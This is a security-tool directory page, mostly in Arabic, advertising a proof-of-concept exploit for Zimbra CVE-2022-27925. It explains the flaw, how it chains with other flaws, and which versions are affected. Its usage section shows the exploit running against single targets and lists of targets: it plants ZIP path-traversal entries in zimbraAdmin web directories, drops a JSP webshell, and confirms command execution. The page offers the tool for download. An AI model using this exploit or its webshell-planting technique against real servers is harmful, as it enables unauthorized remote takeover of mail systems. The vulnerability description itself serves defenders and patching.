Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-27925 — PoC | Kitploit
أدوات/GitHubGitHub/sanan2004/cve-2022-27925
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubsanan2004/cve-2022-27925

CVE-2022-27925

PoC

عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-27925

الوصف

في 10 مايو 2022، أصدرت Zimbra الإصدارين 9.0.0 patch 24 و8.8.15 patch 31 لمعالجة العديد من الثغرات الأمنية في Zimbra Collaboration Suite، بما في ذلك CVE-2022-27924 (التي كتبنا عنها سابقًا) وCVE-2022-27925.

في البداية، وصفت Zimbra ثغرة CVE-2022-27925 على أنها هجوم اجتياز مسار مصادق عليه، حيث يمكن لمستخدم إداري كتابة ملفات في أي دليل على نظام الملفات باستخدام حساب Zimbra. ونظرًا لأنها كانت تعتبر في البداية هجومًا يقتصر على المسؤولين فقط، منحتها NVD درجة أساسية 7.8 في CVSS. لاحقًا، لاحظت Volexity أن المهاجمين الذين يستغلون هذه الثغرة وجدوا طريقة لتجاوز المتطلبات الإدارية، وكتبت عن ذلك في 10 أغسطس 2022. وقد حصل هذا التجاوز الجديد للمصادقة على معرّف جديد – CVE-2022-37042.

من خلال الجمع بين ثغرة اجتياز المسار الأصلية وتجاوز المصادقة الجديد، يمكن للمهاجمين اختراق نظام Zimbra Collaboration Suite عن بُعد عبر منفذ المسؤول (7071 افتراضيًا) بشكل مجهول. وبدمجها مع ثغرة تصعيد صلاحيات غير مصححة حاليًا كتبنا عنها مؤخرًا وكتبنا لها استغلالًا، تؤدي هذه الثغرات الثلاث إلى تنفيذ أوامر عن بُعد بصلاحيات المستخدم الجذر على الأنظمة غير المصححة.

على الرغم من أن النشرات الاستشارية العامة لا تذكر ذلك، إلا أنه وفقًا لتحليلنا، فإن Zimbra Collaboration Suite Network Edition (النسخة المدفوعة) معرضة للخطر، بينما Open Source Edition (المجانية) ليست كذلك (لأنها لا تحتوي على نقطة نهاية mboximport المعرضة للخطر). الإصدارات المعرضة للخطر هي:

Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)

هذه الثغرات (وغيرها في Zimbra) تُستهدف لاستغلال واسع النطاق في البرية، وبالتالي يجب تصحيحها أو إيقاف تشغيلها في أقرب وقت ممكن. إذا كنت تشك في تعرضك للاختراق، توفر Zimbra خطوات لإعادة بناء خادم Zimbra Collaboration Suite من الصفر على أحدث تصحيح دون فقدان البيانات.

المصدر: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis

الاستخدام

_____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

usage: exploit.py [-h] [-t TARGET] [-l LIST]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URl with protocol HTTPS
  -l LIST, --list LIST  List of targets

مثال على التشغيل

root@root# python exploit.py -t zimbra.example.com
_____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925 Sanan Qasim

[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux

root@root# python exploit.py -l targets.txt

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925 sanan Qasim

[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
تنزيل الأداة